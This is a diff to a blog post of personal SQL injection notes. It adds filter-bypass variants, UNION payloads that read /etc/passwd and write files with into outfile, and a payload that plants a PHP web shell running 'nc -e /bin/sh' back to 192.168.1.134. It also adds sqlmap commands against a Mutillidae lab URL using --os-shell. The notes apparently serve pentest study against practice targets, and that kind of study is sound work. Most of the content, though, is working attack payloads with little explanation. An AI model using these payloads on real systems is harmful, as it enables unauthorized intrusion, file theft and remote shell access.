--- a/_posts/notes/databases/2021-12-12-sqli.md
+++ b/_posts/notes/databases/2021-12-12-sqli.md
@@ -11,32 +11,38 @@ Maybe the database have the default login, we can try with:
 {% endhighlight %}
 
 # [](#header-4)Basic Injection
-
 If we can send a query to the database to log, we can do:
 {% highlight plain %}
 ' or '1'='1' --
 {% endhighlight %}
 
-With this we replace the original input (') and make a statement, do the query or check if 1=1.
+Probably we need to change the text to bypass filter:
+{% highlight plain %}
+aNd 1=1
+aNd 21=21
+orDeR bY 1
+orDer+bY+1
+orDer/\*\*/bY/\*\*/1
+orDer%20bY%201
+{% endhighlight %}
+We can change the spaces by:
+{% highlight plain %}
++, /**/, %20
+{% endhighlight %}
+
 Then we add a comment line, there are different comment for each program:
 - Oracle: --
 - MySQL: #
 - MariaDB: /* */
+Some others comment can be:
+- /*
+- //
+- %23
+
+##### Probably, we need to add **;** at the end of the query (before the comment).
 
 
-Also we can change the *or* part with the **UNION** syntax.
-{% highlight plain %}
-' union select ...
-{% endhighlight %}
-
-Now we can execute any code we want in the db.
-We can check all the tables with this:
-{% highlight plain %}
-' union select null, 'test', from dual --
-{% endhighlight %}
-We need to use the same number of field from the tables, so we just need to keep trying adding new fields.
-
-We can try to catch the login request with burp and send the SQLi with it.
+Also, we can try to catch the login request with burp and send the SQLi with it.
 
 # [](#header-4)Error Based
 When we see an SQL error in the page we can try to gather information of the web.
@@ -76,6 +82,16 @@ Some databases can limit the amount on databases show, we can try to change it w
 To get the columns of a table:
 {% highlight plain %}
 ... UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_schema = "database-name" AND table_name = "table-name";
+{% endhighlight %}
+
+We can use this syntax to read and write system files:
+{% highlight plain %}
+... UNION SELECT load_file('/etc/passwd'), NULL;
+... UNION SELECT 'SUS', NULL into outfile '/tmp/attack.txt;
+{% endhighlight %}
+And then create a reverse shell:
+{% highlight plain %}
+' union select null,'<?passthru("nc -e /bin/sh 192.168.1.134 9000");?>' into outfile '/tmp/shell.php'#
 {% endhighlight %}
 
 If we can not pass a string like **"database-name"** we can encode it:
@@ -141,3 +157,13 @@ log.info("Database: %s" % result)
 {% endhighlight %}
 
 We can change **database()** from the others functions in the **Error Based** to guess another values (tables, columns,...).
+
+# [](#header-4)SQLmap
+We can try searching a URL with:
+{% highlight plain %}
+> sqlmap -u "http://192.168.1.137/mutillidae/index.php?page=user-info.php&username=admin&password=aaaa&user-info-php-submit-button=View+Account+Details"
+{% endhighlight %}
+
+We can use the following options to get a reverse shell:
+- **--os-shell**
+- **--sql-shell**
